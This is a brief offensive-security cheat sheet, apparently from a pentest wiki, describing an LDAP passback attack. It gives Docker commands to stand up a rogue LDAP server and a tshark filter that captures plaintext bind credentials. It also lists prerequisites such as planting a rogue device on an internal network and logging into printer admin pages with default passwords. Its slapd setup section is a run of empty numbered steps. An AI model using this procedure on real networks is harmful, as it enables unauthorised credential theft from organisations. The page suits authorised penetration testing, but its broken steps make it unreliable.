LDAP Passback
1) Setup rogue LDAP server
docker buildx build -t ldap-passback .
docker run --rm -ti -p 389:389 ldap-passback2) Listen with tshark to capture plain-text credentials
tshark -i any -f "port 389" -Y "ldap.protocolOp == 0 && ldap.simple" -e ldap.name -e ldap.simple -TjsonRequirements:
Initial access to the internal network (example: plugging in a rogue device in a boardroom)
Gain access to a device's configuration where the LDAP parameters are specified. (Example: the web interface of a network printer)
They have usually default credentials (admin:admin, admin:password, etc.)
Host a rogue LDAP server:
sudo systemctl enable slapd1:
2:
3:
4:
5:
6:
7:
8: Create new ldif file
Example:
9:
10: Verify with:
11: Capture LDAP credentials
We should get credentials in plain text.
Last updated